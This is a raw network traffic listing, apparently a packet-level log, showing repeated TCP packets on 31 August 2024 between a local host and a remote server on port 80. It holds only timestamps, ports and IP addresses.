Aug 31, 2024 22:41:57.628276110 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628278971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628285885 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628302097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628310919 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628333092 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628344059 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628354073 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628356934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628376007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628398895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628421068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628432035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628457069 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628468037 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628473997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628495932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628511906 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628514051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628530025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628547907 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628551006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628578901 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628590107 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628614902 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628627062 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628639936 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628684998 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628693104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628693104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628696918 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628709078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628726959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628751040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628763914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628766060 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628777027 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628781080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628787994 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628797054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628808975 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628820896 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628820896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628829002 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628853083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628870010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628881931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628901958 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628901958 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628921032 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.628973007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.628993034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629010916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629029989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629048109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629066944 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629077911 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629087925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629089117 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629106998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629110098 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629122019 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629123926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629141092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629188061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629199028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629219055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629235983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629281998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629302979 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629304886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629317999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629344940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629355907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629365921 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629378080 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629379988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629391909 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629475117 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629487038 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629498005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629501104 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629513025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629535913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629555941 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629563093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629578114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629601002 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629620075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629641056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629643917 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629663944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629676104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629699945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629720926 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629723072 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629733086 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629744053 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629755974 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629766941 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629776955 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629786968 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629795074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629822016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629841089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629893064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629909039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629934072 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629949093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629966021 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629971981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629978895 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.629981995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.629990101 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630002022 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630012989 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630024910 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630034924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630053997 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630055904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630064964 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630076885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630100012 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630111933 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630115986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630162954 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630167961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630175114 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630184889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630184889 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630201101 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630203009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630232096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630247116 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630253077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630295038 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630337000 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630379915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630398989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630413055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630423069 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630433083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630434990 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630454063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630480051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630496979 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630501032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630508900 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630522013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630541086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630568027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630578041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630599022 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630600929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630609035 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630616903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630620956 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630642891 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630652905 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630705118 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630721092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630744934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630776882 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630789042 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630795002 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630799055 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630811930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630844116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630855083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630866051 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.630906105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630928040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630942106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.630986929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631011009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631031036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631052017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631083965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631115913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631123066 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.631134987 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.631145954 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.631155968 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.631166935 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.631176949 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.631189108 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.631248951 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631264925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631285906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631287098 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.631298065 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.631299973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631309032 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.631318092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631336927 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.631345034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631365061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631386042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631402969 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631418943 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631439924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631462097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631498098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631581068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631597996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631619930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631642103 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631694078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631716013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631736040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631755114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631802082 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631822109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631840944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631889105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631908894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631937981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631953001 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631979942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.631998062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632138014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632150888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632174969 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632196903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632211924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632232904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632247925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632270098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632289886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632308960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632330894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632354975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632438898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632463932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632488966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632503033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632523060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632575989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632591963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632617950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632637024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632684946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632700920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632725954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632739067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632793903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632816076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632839918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632857084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.632884026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633009911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633029938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633053064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633068085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633089066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633110046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633131027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633145094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633163929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633187056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633209944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633227110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633311987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633332968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633352995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633411884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633431911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633455038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633476973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633495092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633538961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633560896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633580923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633605003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633616924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633670092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633692026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633717060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633738995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633757114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633774996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633794069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633944988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633944988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633960009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.633977890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634002924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634022951 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634043932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634067059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634080887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634100914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634129047 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634146929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634165049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634186029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634267092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634282112 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634305000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634380102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634380102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634474993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634495974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634515047 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634536982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634588957 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634603977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634633064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634654999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634673119 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634814978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634833097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.634857893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.640718937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.640759945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.640799046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641027927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641069889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641094923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641221046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641251087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641278028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641366005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641391993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641478062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641508102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641520977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641550064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641575098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641769886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641796112 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641824007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.641845942 CEST	49732	80	192.168.2.4	185.215.113.19
